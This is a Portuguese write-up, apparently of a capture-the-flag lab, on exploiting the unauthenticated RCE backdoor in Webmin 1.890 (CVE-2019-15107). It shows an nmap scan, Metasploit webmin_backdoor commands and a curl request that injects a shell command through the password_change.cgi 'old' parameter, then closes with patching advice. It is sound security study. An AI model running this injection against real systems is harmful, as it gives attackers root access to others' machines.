
Objectivo da Investigação: Realizar uma análise abrangente e exploração bem-sucedida de uma vulnerabilidade de Execução Remota de Código (RCE) no Webmin versão 1.890 (CVE-2019-15107), obtendo, em última análise, controlo total sobre o sistema alvo.
Objetivo da Pesquisa: Realizar uma análise abrangente e exploração bem-sucedida de uma vulnerabilidade de Execução Remota de Código (RCE) no Webmin versão 1.890 (CVE-2019-15107), obtendo controle total sobre o sistema alvo.
Metodologia:
Reconhecimento Inicial:
Varredura de rede realizada com Nmap:
bash nmap -sV -sC -A -p- 10.201.105.185 Identificado serviço Webmin 1.890 rodando na porta 10000
Análise de Vulnerabilidade:
Investigado o mecanismo da vulnerabilidade em password_change.cgi
Confirmada a possibilidade de execução arbitrária de comandos sem autenticação
Exploração:
Implementados dois vetores de ataque:
Usando o Metasploit Framework:
bash use exploit/linux/http/webmin_backdoor set RHOSTS 10.201.105.185 set LHOST tun0 exploit Exploração manual via curl:
bash curl -k "https://10.201.105.185:10000/password_change.cgi" -d "user=root&pam=&expired=2&old=test|id&new1=test&new2=test" Pós-Exploração:
Obtido shell interativo como root
Conduzida análise do sistema de arquivos
Descobertos arquivos de flag:
bash /home/dark/user.txt /root/root.txt Descobertas:
Vulnerabilidade CVE-2019-15107 explorada com sucesso
Obtidos privilégios completos de root no sistema
Demonstrada a importância crítica de atualizações de software em tempo hábil
Conclusões Técnicas:
A vulnerabilidade permite execução arbitrária de comandos via injeção no parâmetro "old"
A ausência de verificações de autenticação torna isso particularmente perigoso
A versão 1.890 contém uma backdoor corrigida em versões posteriores
Recomendações de Segurança:
Atualização imediata para a versão atual do Webmin
Restringir acesso ao painel de gerenciamento por IP
Auditorias regulares de segurança em aplicações web
Direções para Pesquisas Futuras:
Análise de outras vulnerabilidades do Webmin
Desenvolvimento de exploit personalizado sem Metasploit
Investigação de técnicas de persistência em sistemas comprometidos
Este estudo de caso demonstra a importância crítica de atualizações oportunas no sistema e a necessidade de monitoramento contínuo de vulnerabilidades em software implantado. A pesquisa fornece insights práticos sobre técnicas modernas de exploração de aplicações web, ao mesmo tempo em que enfatiza princípios fundamentais de segurança.